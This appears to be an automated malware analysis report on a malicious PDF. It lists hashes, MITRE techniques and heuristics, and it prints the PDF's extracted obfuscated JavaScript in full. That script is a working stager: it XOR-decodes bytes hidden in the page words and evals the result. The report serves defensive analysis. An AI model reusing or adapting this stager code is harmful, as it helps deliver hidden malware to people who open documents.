Malicious PDF — malware analysis report

Static analysis result for SHA-256 82cdaaacf5725c34…

MALICIOUS

PDF

4.5 KB Authoring application: Vabameuaki First seen: 2026-05-10
MD5: 8d7aebd66a47ca4cd5a454d7d2d49ca4 SHA-1: 3331bd40804bcf5f027cf13e70e23ed3097b9d7d SHA-256: 82cdaaacf5725c344ba25c8ac1cdc381a0ac5b1e1c60d56e035e5a7fd2fe2232
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains obfuscated JavaScript that uses string concatenation and XOR operations to construct and execute a payload. The script appears to be a stager designed to download and execute a second-stage malicious file from a remote location. The ML classifier and heuristic firings strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0xCA2 815 bytes
SHA-256: 1ec398366107a5fedd9bcf18a57f32d68d58e87986c8ad1c876f457b209e2152
Preview script
First 1,000 lines of the extracted script
var qX=String("getPa"+"geNth1OA8".substr(0,5)+"IsbWord".substr(3));function t(h,j){return h^j;};var jS=this;;var aR=new String("from"+"G0DChar".substr(3)+"CodeWqM2".substr(0,4));var p=String;var f=new String();var pY="unes"+"cape";var cV="subs"+"trDbgy".substr(0,2);var jSX=1;var n=91;var hS="getPa"+"YTRgeNum".substr(3)+"hOXWords".substr(3);var cX=String("char"+"Code1jzi".substr(0,4)+"At52Ml".substr(0,2));var nM=["p","","p","a"];oX=new String(nM[3]+nM[0]+nM[0]+nM[1]);var nO=["l","e","v","","a"];sX=new String(nO[1]+nO[2]+nO[4]+nO[0]+nO[3]);var l=4618-4618;;var z=new String("U9j%".substr(3));var v=73-71;var x=jS[sX];var hC=jS[hS](jSX);var oX=jS[oX];;var oR=jS[pY];for(var d=l;d<hC;d++){jW=jS[qX](jSX,d);var uN=jW[cV](jW.length-v,v);var nC=z+uN;var mT=oR(nC);var hI=mT[cX](l);var cD=t(hI,n);f+=p[aR](cD);}x(f);

Open this report in the interactive analyzer, or submit your own file for analysis.